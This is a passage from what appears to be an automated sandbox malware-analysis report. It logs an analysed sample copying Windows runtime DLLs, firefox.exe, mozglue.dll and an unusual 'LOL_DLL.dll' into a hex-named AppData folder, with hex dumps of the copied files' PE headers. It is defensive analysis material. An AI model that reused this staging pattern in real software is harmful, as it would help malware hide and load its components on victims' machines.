sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-2-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l2-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-heap-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-localization-l1-2-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
File CreatedFile Created
Copyright Joe Security LLC 2018 Page 116 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-memory-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-1.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-2-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-timezone-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
File Path Access Attributes Options Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 117 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-convert-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-environment-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-filesystem-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-heap-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-locale-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-math-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-multibyte-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-runtime-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-stdio-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-string-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-time-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-utility-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
File Path Access Attributes Options Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 118 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\dependentlibs.list read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\gaddafi-sarkozy-handshake.jpg
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\mozglue.dll read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcp140.dll read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dll read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\ucrtbase.dll read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\vcruntime140.dll read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\_isetup read data or list directory and synchronize
normal directory file and synchronous io non alert and open for backup ident and open reparse point
success or wait 1 2E3089 CreateDirectoryA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\_isetup read data or list directory and synchronize
normal directory file and synchronous io non alert and open for backup ident and open reparse point
object name collision 1 2E2F63 CreateDirectoryA
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E0000 read attributes and synchronize and generic write
normal synchronous io non alert and non directory file
success or wait 1 2E4383 CreateFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000 read data or list directory and synchronize
normal directory file and synchronous io non alert and open for backup ident and open reparse point
object name collision 1 2E34A4 CreateDirectoryA
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File WrittenFile Written
Copyright Joe Security LLC 2018 Page 119 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dll
0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-datetime-l1-1-0.dll
0 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 120 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dll
0 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dll
0 18104 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 121 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dll
0 21696 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-2-0.dll
0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 122 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l2-1-0.dll
0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 bf 99 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dll
0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 123 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-heap-l1-1-0.dll
0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dll
0 18104 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 124 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dll
0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-localization-l1-2-0.dll
0 20672 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
